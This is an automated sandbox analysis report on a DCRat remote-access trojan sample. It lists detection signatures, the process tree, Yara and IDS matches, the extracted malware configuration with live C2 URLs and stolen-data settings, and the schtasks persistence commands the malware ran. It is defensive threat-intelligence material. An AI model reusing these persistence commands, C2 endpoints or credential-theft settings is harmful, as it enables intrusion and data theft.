

Windows Analysis Report
UNFOT5F1qt.exe

Overview

General Information

Sample name: UNFOT5F1qt.exe (renamed because the original name is a hash value)
Original sample name: 1C40D9E61FBBD5D9054638B98B10E1CF.exe
Analysis ID: 1563543
MD5: 1c40d9e61fbbd5d9054638b98b10e1cf
SHA1: 145119e649cabc6c60200643b3cc347fc4b164cc
SHA256: 854b586f8d0cad52a042ccee32691dc9c30e6a32bd3805024934f43e169325af
Tags: DCRat, exe, user-abuse_ch

Detection

Detection: DCRat
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected DCRat
.NET source code references suspicious native API functions
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Creates an autostart registry key pointing to binary in C:\Windows
Creates multiple autostart registry keys
Creates processes via WMI
Drops PE files to the user root directory
Drops PE files with benign system names
Drops executables to the windows directory (C:\Windows) and starts them
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: System File Execution Location Anomaly
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the user directory
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Add Scheduled Task Parent
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • UNFOT5F1qt.exe (PID: 2000 cmdline: "C:\Users\user\Desktop\UNFOT5F1qt.exe" MD5: 1C40D9E61FBBD5D9054638B98B10E1CF)
    • UNFOT5F1qt.exe (PID: 1460 cmdline: "C:\Users\user\Desktop\UNFOT5F1qt.exe" MD5: 1C40D9E61FBBD5D9054638B98B10E1CF)
      • savesbrokerDriverSavesbroker.exe (PID: 7188 cmdline: "C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe" MD5: 222EDC84E2D32948F2639554B23E7B04)
        • schtasks.exe (PID: 7408 cmdline: schtasks.exe /create /tn "HSZUYllrTVQhIRaXpKBgYbmVnCoTc" /sc ONLOGON /tr "'C:\Recovery\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • schtasks.exe (PID: 7432 cmdline: schtasks.exe /create /tn "HSZUYllrTVQhIRaXpKBgYbmVnCoTc" /sc ONLOGON /tr "'C:\Recovery\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • schtasks.exe (PID: 7456 cmdline: schtasks.exe /create /tn "HSZUYllrTVQhIRaXpKBgYbmVnCoTc" /sc ONLOGON /tr "'C:\Users\All Users\Application Data\Application Data\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • schtasks.exe (PID: 7480 cmdline: schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Users\Default User\WmiPrvSE.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • schtasks.exe (PID: 7504 cmdline: schtasks.exe /create /tn "WerFault" /sc ONLOGON /tr "'C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • schtasks.exe (PID: 7528 cmdline: schtasks.exe /create /tn "HSZUYllrTVQhIRaXpKBgYbmVnCoTc" /sc ONLOGON /tr "'C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • schtasks.exe (PID: 7552 cmdline: schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Windows\regedit\explorer.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • schtasks.exe (PID: 7576 cmdline: schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Documents and Settings\Public\Pictures\RuntimeBroker.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • WerFault.exe (PID: 7604 cmdline: "C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe" MD5: 222EDC84E2D32948F2639554B23E7B04)
      • FPS Booster 2.0.7.exe (PID: 7236 cmdline: "C:\Users\user\AppData\Local\Temp\FPS Booster 2.0.7.exe" MD5: 74BE806E27A351565F2EC136DCB5232C)
    • WerFault.exe (PID: 7212 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2000 -s 1156 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • explorer.exe (PID: 7664 cmdline: C:\Windows\regedit\explorer.exe MD5: 222EDC84E2D32948F2639554B23E7B04)
  • HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe (PID: 7672 cmdline: "C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe" MD5: 222EDC84E2D32948F2639554B23E7B04)
  • HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe (PID: 8000 cmdline: "C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe" MD5: 222EDC84E2D32948F2639554B23E7B04)
  • explorer.exe (PID: 616 cmdline: "C:\Windows\regedit\explorer.exe" MD5: 222EDC84E2D32948F2639554B23E7B04)
  • cleanup
Malware Configuration

{"H1": "http://188.120.228.203/MathpoolCam/rulemessagerecord/screenscript/binAutomessage/Prefantitrace/coresupport/Cpubinphpmessage/framescriptdata/MathPref/log/Camtracelimitmessage/htop/@==AbhNnclZXauVHdsVXYmVGZ", "H2": "http://188.120.228.203/MathpoolCam/rulemessagerecord/screenscript/binAutomessage/Prefantitrace/coresupport/Cpubinphpmessage/framescriptdata/MathPref/log/Camtracelimitmessage/htop/@==AbhNnclZXauVHdsVXYmVGZ", "TAG": "", "MUTEX": "DCR_MUTEX-9cHOEfz43eiRgQzXdpNO", "LDTM": false, "DBG": false, "BCS": 0, "AUR": 1, "ASCFG": {"ignorepartiallyemptydata": false, "cookies": true, "passwords": true, "forms": true, "cc": true, "history": false, "telegram": true, "steam": true, "discord": true, "filezilla": true, "screenshot": true, "clipboard": true, "sysinfo": true}, "AS": true, "ASO": true, "ASP": "%UsersFolder% - Fast", "AK": true, "AD": false}
Yara matches on dropped files

Source | Rule | Description | Author | Strings
C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security
C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security
C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe | MALWARE_Win_DCRat | DCRat payload | ditekSHen
  • 0x66bb0:$x1: px"><center>DCRat Keylogger
  • 0x7b998:$x2: DCRat-Log#
  • 0x64ca0:$x3: DCRat.Code
  • 0x65f75:$v1: Plugin couldn't process this action!
  • 0x65fbf:$v2: Unknown command!
  • 0x66137:$v3: PLUGINCONFIGS
  • 0x7b9d4:$v4: Saving log...
  • 0x7b9f0:$v5: ~Work.log
  • 0x64948:$v6: MicrophoneNum
  • 0x64990:$v7: WebcamNum
  • 0x662b5:$v8: %SystemDrive% - Slow
  • 0x662df:$v9: %UsersFolder% - Fast
  • 0x66309:$v10: %AppData% - Very Fast
  • 0x66619:$v11: <span style="color: #F85C50;">[Up]</span>
  • 0x6666d:$v11: <span style="color: #F85C50;">[Down]</span>
  • 0x66777:$v11: <span style="color: #F85C50;">[Enter]</span>
  • 0x667d1:$v11: <span style="color: #F85C50;">[ESC]</span>
  • 0x66827:$v11: <span style="color: #F85C50;">[CTRL]</span>
  • 0x6687f:$v11: <span style="color: #F85C50;">[Shift]</span>
  • 0x66931:$v11: <span style="color: #F85C50;">[Win]</span>
  • 0x66987:$v11: <span style="color: #F85C50;">[Tab]</span>
C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0x7e269:$s8: Win32_ComputerSystem
  • 0x7e368:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x7e405:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x7e51a:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x64e06:$cnc4: POST / HTTP/1.1
C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security
Yara matches on memory dumps

Source | Rule | Description | Author | Strings
00000017.00000002.1520715428.000000000285A000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security
00000013.00000002.1476965095.0000000002EE0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security
00000005.00000002.1397323956.0000000002BF0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security
00000005.00000000.1348990255.0000000000822000.00000002.00000001.01000000.00000007.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security
00000005.00000000.1348990255.0000000000822000.00000002.00000001.01000000.00000007.sdmp | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0x7e069:$s8: Win32_ComputerSystem
  • 0x7e168:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x7e205:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x7e31a:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x64c06:$cnc4: POST / HTTP/1.1
Yara matches on unpacked PEs

Source | Rule | Description | Author | Strings
5.0.savesbrokerDriverSavesbroker.exe.820000.0.unpack | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security
5.0.savesbrokerDriverSavesbroker.exe.820000.0.unpack | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security
5.0.savesbrokerDriverSavesbroker.exe.820000.0.unpack | MALWARE_Win_DCRat | DCRat payload | ditekSHen
  • 0x66bb0:$x1: px"><center>DCRat Keylogger
  • 0x7b998:$x2: DCRat-Log#
  • 0x64ca0:$x3: DCRat.Code
  • 0x65f75:$v1: Plugin couldn't process this action!
  • 0x65fbf:$v2: Unknown command!
  • 0x66137:$v3: PLUGINCONFIGS
  • 0x7b9d4:$v4: Saving log...
  • 0x7b9f0:$v5: ~Work.log
  • 0x64948:$v6: MicrophoneNum
  • 0x64990:$v7: WebcamNum
  • 0x662b5:$v8: %SystemDrive% - Slow
  • 0x662df:$v9: %UsersFolder% - Fast
  • 0x66309:$v10: %AppData% - Very Fast
  • 0x66619:$v11: <span style="color: #F85C50;">[Up]</span>
  • 0x6666d:$v11: <span style="color: #F85C50;">[Down]</span>
  • 0x66777:$v11: <span style="color: #F85C50;">[Enter]</span>
  • 0x667d1:$v11: <span style="color: #F85C50;">[ESC]</span>
  • 0x66827:$v11: <span style="color: #F85C50;">[CTRL]</span>
  • 0x6687f:$v11: <span style="color: #F85C50;">[Shift]</span>
  • 0x66931:$v11: <span style="color: #F85C50;">[Win]</span>
  • 0x66987:$v11: <span style="color: #F85C50;">[Tab]</span>
5.0.savesbrokerDriverSavesbroker.exe.820000.0.unpack | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0x7e269:$s8: Win32_ComputerSystem
  • 0x7e368:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x7e405:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x7e51a:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x64e06:$cnc4: POST / HTTP/1.1

System Summary

Source: File created | Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe, ProcessId: 7188, TargetFilename: C:\Users\Default User\WmiPrvSE.exe
Source: Process started | Author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali | Data: Command: C:\Windows\regedit\explorer.exe, CommandLine: C:\Windows\regedit\explorer.exe, CommandLine|base64offset|contains: , Image: C:\Windows\regedit\explorer.exe, NewProcessName: C:\Windows\regedit\explorer.exe, OriginalFileName: C:\Windows\regedit\explorer.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1124, ProcessCommandLine: C:\Windows\regedit\explorer.exe, ProcessId: 7664, ProcessName: explorer.exe
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: "C:\Recovery\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe, ProcessId: 7188, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\HSZUYllrTVQhIRaXpKBgYbmVnCoTc
Source: File created | Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) | Data: EventID: 11, Image: C:\Users\user\Desktop\UNFOT5F1qt.exe, ProcessId: 1460, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: schtasks.exe /create /tn "HSZUYllrTVQhIRaXpKBgYbmVnCoTc" /sc ONLOGON /tr "'C:\Recovery\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe'" /rl HIGHEST /f, CommandLine: schtasks.exe /create /tn "HSZUYllrTVQhIRaXpKBgYbmVnCoTc" /sc ONLOGON /tr "'C:\Recovery\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe'" /rl HIGHEST /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe, ParentProcessId: 7188, ParentProcessName: savesbrokerDriverSavesbroker.exe, ProcessCommandLine: schtasks.exe /create /tn "HSZUYllrTVQhIRaXpKBgYbmVnCoTc" /sc ONLOGON /tr "'C:\Recovery\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe'" /rl HIGHEST /f, ProcessId: 7408, ProcessName: schtasks.exe

Persistence and Installation Behavior

Source: Process started | Author: Joe Security | Data: Command: schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Documents and Settings\Public\Pictures\RuntimeBroker.exe'" /rl HIGHEST /f, CommandLine: schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Documents and Settings\Public\Pictures\RuntimeBroker.exe'" /rl HIGHEST /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe, ParentProcessId: 7188, ParentProcessName: savesbrokerDriverSavesbroker.exe, ProcessCommandLine: schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Documents and Settings\Public\Pictures\RuntimeBroker.exe'" /rl HIGHEST /f, ProcessId: 7576, ProcessName: schtasks.exe

Suricata IDS alerts

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-27T04:02:07.712551+0100 | 2034194 | 1 | A Network Trojan was detected | 192.168.2.9 | 49723 | 188.120.228.203 | 80 | TCP
2024-11-27T04:02:17.428898+0100 | 2034194 | 1 | A Network Trojan was detected | 192.168.2.9 | 49746 | 188.120.228.203 | 80 | TCP
2024-11-27T04:02:25.553488+0100 | 2034194 | 1 | A Network Trojan was detected | 192.168.2.9 | 49767 | 188.120.228.203 | 80 | TCP
2024-11-27T04:02:33.366043+0100 | 2034194 | 1 | A Network Trojan was detected | 192.168.2.9 | 49785 | 188.120.228.203 | 80 | TCP
2024-11-27T04:02:42.961482+0100 | 2034194 | 1 | A Network Trojan was detected | 192.168.2.9 | 49806 | 188.120.228.203 | 80 | TCP
2024-11-27T04:02:51.179051+0100 | 2034194 | 1 | A Network Trojan was detected | 192.168.2.9 | 49827 | 188.120.228.203 | 80 | TCP



AV Detection

Source: UNFOT5F1qt.exe | Avira: detected
Source: http://188.120.228.203/MathpoolCam/rulemessagerecord/screenscript/binAutomessage/Prefantitrace/coresupport/Cpubinphpmessage/framescriptdata/MathPref/log/Camtracelimitmessage/htop/defaultuniversal.php?8zuOabaF=gPSN2e2E7Tr63&qfhjpvFDRBKGR2CDKyYQ=FUKx&ffd48bee5da8b25eec2684a6d45165e4=0e446e6e149043ae2bd68e78c935f694&bb9ca7a84d5d6bb1b5c819b5ece77831=gNllDM4UmYkRjM0MGOjhzN1IWOzMjM5Q2M1IDMjZzNwMDOwgzM4UTO&8zuOabaF=gPSN2e2E7Tr63&qfhjpvFDRBKGR2CDKyYQ=FUKx | Avira URL Cloud: Label: malware
Source: http://188.120.228.203/MathpoolCam/rulemessagerecord/screenscript/binAutomessage/Prefantitrace/coresupport/Cpubinphpmessage/framescriptdata/MathPref/log/Camtracelimitmessage/htop/defaultuniversal.php?iXKVlgV1rJUk18ntWeDto2=ehI8yOvjOVLkpjdj5bnrkCHcyD&VUNJCpiqydhhm6jGOqX8J25HRAKN=ZpKuVZPAMJ5G3pF&3BvB63waEtcZG=BeVOYxXxQgUGChc2QNztX9ZLfg3t&ffd48bee5da8b25eec2684a6d45165e4=0e446e6e149043ae2bd68e78c935f694&bb9ca7a84d5d6bb1b5c819b5ece77831=gNllDM4UmYkRjM0MGOjhzN1IWOzMjM5Q2M1IDMjZzNwMDOwgzM4UTO&iXKVlgV1rJUk18ntWeDto2=ehI8yOvjOVLkpjdj5bnrkCHcyD&VUNJCpiqydhhm6jGOqX8J25HRAKN=ZpKuVZPAMJ5G3pF&3BvB63waEtcZG=BeVOYxXxQgUGChc2QNztX9ZLfg3t | Avira URL Cloud: Label: malware
Source: http://188.120.228.203/MathpoolCam/rulemessagerecord/screenscript/binAutomessage/Prefantitrace/coresupport/Cpubinphpmessage/framescriptdata/MathPref/log/Camtracelimitmessage/htop/defaultuniversal.php?u94aa9EjMqWeOdgENIA88=a3V2bxddqzBJK7Zui3PhuF6&uzM88ZiIqBiAFihRGs9gdFSiockHtb7=7WHmkffRQ2dI&ffd48bee5da8b25eec2684a6d45165e4=0e446e6e149043ae2bd68e78c935f694&bb9ca7a84d5d6bb1b5c819b5ece77831=gNllDM4UmYkRjM0MGOjhzN1IWOzMjM5Q2M1IDMjZzNwMDOwgzM4UTO&u94aa9EjMqWeOdgENIA88=a3V2bxddqzBJK7Zui3PhuF6&uzM88ZiIqBiAFihRGs9gdFSiockHtb7=7WHmkffRQ2dI | Avira URL Cloud: Label: malware
Source: http://188.120.228.203/MathpoolCam/rulemessagerecord/screenscript/binAutomessage/Prefantitrace/coresupport/Cpubinphpmessage/framescriptdata/MathPref/log/Camtracelimitmessage/htop/defaultuniversal.php?x7sAZ9s8LIMWmsWdYRkexiMsvuP818e=MsDQCmtwup8&WOQPE7JGakLPu9OpuuGMn3K4oG=viytIjYVgdA44zY&ffd48bee5da8b25eec2684a6d45165e4=0e446e6e149043ae2bd68e78c935f694&bb9ca7a84d5d6bb1b5c819b5ece77831=gNllDM4UmYkRjM0MGOjhzN1IWOzMjM5Q2M1IDMjZzNwMDOwgzM4UTO&x7sAZ9s8LIMWmsWdYRkexiMsvuP818e=MsDQCmtwup8&WOQPE7JGakLPu9OpuuGMn3K4oG=viytIjYVgdA44zY | Avira URL Cloud: Label: malware
Source: http://188.120.228.203/MathpoolCam/rulemessagerecord/screenscript/binAutomessage/Prefantitrace/coresupport/Cpubinphpmessage/framescriptdata/MathPref/log/Camtracelimitmessage/htop/defaultuniversal.php?k1RxxsMic1WB03Lj3Jl0wy=eC69X&ffd48bee5da8b25eec2684a6d45165e4=0e446e6e149043ae2bd68e78c935f694&bb9ca7a84d5d6bb1b5c819b5ece77831=gNllDM4UmYkRjM0MGOjhzN1IWOzMjM5Q2M1IDMjZzNwMDOwgzM4UTO&k1RxxsMic1WB03Lj3Jl0wy=eC69X | Avira URL Cloud: Label: malware
Source: http://188.120.228.203/MathpoolCam/rulemessagerecord/screenscript/binAutomessage/Prefantitrace/coresupport/Cpubinphpmessage/framescriptdata/MathPref/log/Camtracelimitmessage/htop/defaultuniversal.php?iXlp95Y2OIhl=j2BPpjdF4opH2L&pCeLVPpGxY9MMAtCHVPqjeDNU=Qnt5hGtlMMnVQK3wN0qXQFLliw&fNL8Q1g9CW202ckxhZwE=wwQN&ffd48bee5da8b25eec2684a6d45165e4=0e446e6e149043ae2bd68e78c935f694&bb9ca7a84d5d6bb1b5c819b5ece77831=gNllDM4UmYkRjM0MGOjhzN1IWOzMjM5Q2M1IDMjZzNwMDOwgzM4UTO&iXlp95Y2OIhl=j2BPpjdF4opH2L&pCeLVPpGxY9MMAtCHVPqjeDNU=Qnt5hGtlMMnVQK3wN0qXQFLliw&fNL8Q1g9CW202ckxhZwE=wwQN | Avira URL Cloud: Label: malware
Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe | Avira: detection malicious, Label: HEUR/AGEN.1309950
Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe | Avira: detection malicious, Label: HEUR/AGEN.1309950
Source: C:\Users\Default\WmiPrvSE.exe | Avira: detection malicious, Label: HEUR/AGEN.1309950
Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe | Avira: detection malicious, Label: HEUR/AGEN.1309950
Source: C:\Users\Public\Pictures\RuntimeBroker.exe | Avira: detection malicious, Label: HEUR/AGEN.1309950
Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe | Avira: detection malicious, Label: HEUR/AGEN.1309950
Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe | Avira: detection malicious, Label: HEUR/AGEN.1309950
Source: C:\Windows\regedit\explorer.exe | Avira: detection malicious, Label: HEUR/AGEN.1309950
Source: explorer.exe.7664.18.memstrmin | Malware Configuration Extractor: DCRat {"H1": "http://188.120.228.203/MathpoolCam/rulemessagerecord/screenscript/binAutomessage/Prefantitrace/coresupport/Cpubinphpmessage/framescriptdata/MathPref/log/Camtracelimitmessage/htop/@==AbhNnclZXauVHdsVXYmVGZ", "H2": "http://188.120.228.203/MathpoolCam/rulemessagerecord/screenscript/binAutomessage/Prefantitrace/coresupport/Cpubinphpmessage/framescriptdata/MathPref/log/Camtracelimitmessage/htop/@==AbhNnclZXauVHdsVXYmVGZ", "TAG": "", "MUTEX": "DCR_MUTEX-9cHOEfz43eiRgQzXdpNO", "LDTM": false, "DBG": false, "BCS": 0, "AUR": 1, "ASCFG": {"ignorepartiallyemptydata": false, "cookies": true, "passwords": true, "forms": true, "cc": true, "history": false, "telegram": true, "steam": true, "discord": true, "filezilla": true, "screenshot": true, "clipboard": true, "sysinfo": true}, "AS": true, "ASO": true, "ASP": "%UsersFolder% - Fast", "AK": true, "AD": false}
Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe | ReversingLabs: Detection: 88%
Source: C:\ProgramData\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe | ReversingLabs: Detection: 88%
Source: C:\Recovery\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe | ReversingLabs: Detection: 88%
Source: C:\Users\Default\WmiPrvSE.exe | ReversingLabs: Detection: 88%
Source: C:\Users\Public\Pictures\RuntimeBroker.exe | ReversingLabs: Detection: 88%
Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe | ReversingLabs: Detection: 88%
Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe | ReversingLabs: Detection: 88%
Source: C:\Windows\regedit\explorer.exe | ReversingLabs: Detection: 88%
Source: UNFOT5F1qt.exe | ReversingLabs: Detection: 52%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe | Joe Sandbox ML: detected
Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe | Joe Sandbox ML: detected
Source: C:\Users\Default\WmiPrvSE.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe | Joe Sandbox ML: detected
Source: C:\Users\Public\Pictures\RuntimeBroker.exe | Joe Sandbox ML: detected
Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe | Joe Sandbox ML: detected
Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe | Joe Sandbox ML: detected
Source: C:\Windows\regedit\explorer.exe | Joe Sandbox ML: detected
Source: UNFOT5F1qt.exe | Joe Sandbox ML: detected
Source: UNFOT5F1qt.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe | Directory created: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe
Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe | Directory created: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\e7d19d53a5ec77aafa68c9a929149b118506bb42
Source: UNFOT5F1qt.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: UNFOT5F1qt.exe, 00000000.00000002.1455647318.0000000000B95000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: E:\A\_work\40\s\obj\Microsoft.VisualStudio.Threading\Release\net45\Microsoft.VisualStudio.Threading.pdb source: UNFOT5F1qt.exe
